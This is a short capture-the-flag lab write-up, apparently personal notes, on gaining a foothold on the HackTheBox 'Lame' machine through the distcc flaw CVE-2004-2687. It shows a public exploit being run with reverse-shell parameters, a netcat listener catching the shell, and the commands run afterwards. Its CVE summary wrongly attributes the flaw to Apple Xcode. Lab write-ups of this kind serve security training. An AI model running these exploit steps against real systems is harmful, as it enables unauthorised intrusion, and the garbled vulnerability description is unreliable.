InfoSec LAB

Lame_Exploitation

Created: 2 min read

CVE-2004-2687

a vulnerability was found in apple xcode 1.5 (Programming Tool Software) and classified as very critical. Affected by this issue is an unknown part of the component Authorization. The manipulation with an unknown input leads to a config vulnerability. Using CWE to declare the problem leads to CWE-16. Impacted is confidentiality, integrity, and availability.

Exploit

I found an exploit online.

Exploitation

┌──(kali㉿kali)-[~/archive/htb/labs/lame]
└─$ python3 CVE-2004-2687.py --rhost $IP --rport 3632 --lhost 10.10.14.2 --lport 443
[+] payload: Payload generated!
[+] execution: DistCC Daemon exploited with success!
[+] opening connection to 10.10.10.3 on port 3632: Done
[◐] trying to bind to :: on port 443: Trying ::
traceback (most recent call last):
  File "/home/kali/archive/htb/labs/lame/CVE-2004-2687.py", line 120, in <module>
    shell = listen(lport, timeout=20).wait_for_connection()
  File "/home/kali/.local/lib/python3.10/site-packages/pwnlib/tubes/listen.py", line 103, in __init__
    listen_sock.bind(self.sockaddr)
oserror: [Errno 98] Address already in use
[*] Closed connection to 10.10.10.3 port 3632

Launching the exploit

┌──(kali㉿kali)-[~/archive/htb/labs/lame]
└─$ nnc 443           
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.3] 47188
whoami
daemon
hostname
lame
ifconfig
eth0      link encap:Ethernet  HWaddr 00:50:56:b9:b0:52  
          inet addr:10.10.10.3  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:feb9:b052/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:b052/64 Scope:Link
          up broadcast running multicast  mtu:1500  Metric:1
          rx packets:356865 errors:0 dropped:0 overruns:0 frame:0
          tx packets:2882 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          rx bytes:26621350 (25.3 MB)  TX bytes:432817 (422.6 KB)
          interrupt:19 Base address:0x2024 
 
lo        link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          up loopback running  mtu:16436  Metric:1
          rx packets:364 errors:0 dropped:0 overruns:0 frame:0
          tx packets:364 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          rx bytes:154817 (151.1 KB)  TX bytes:154817 (151.1 KB)

Initial Foothold established to the target system as the daemon user via exploiting CVE-2004-2687 on the target distcc instance

Interactive Graph View

Backlinks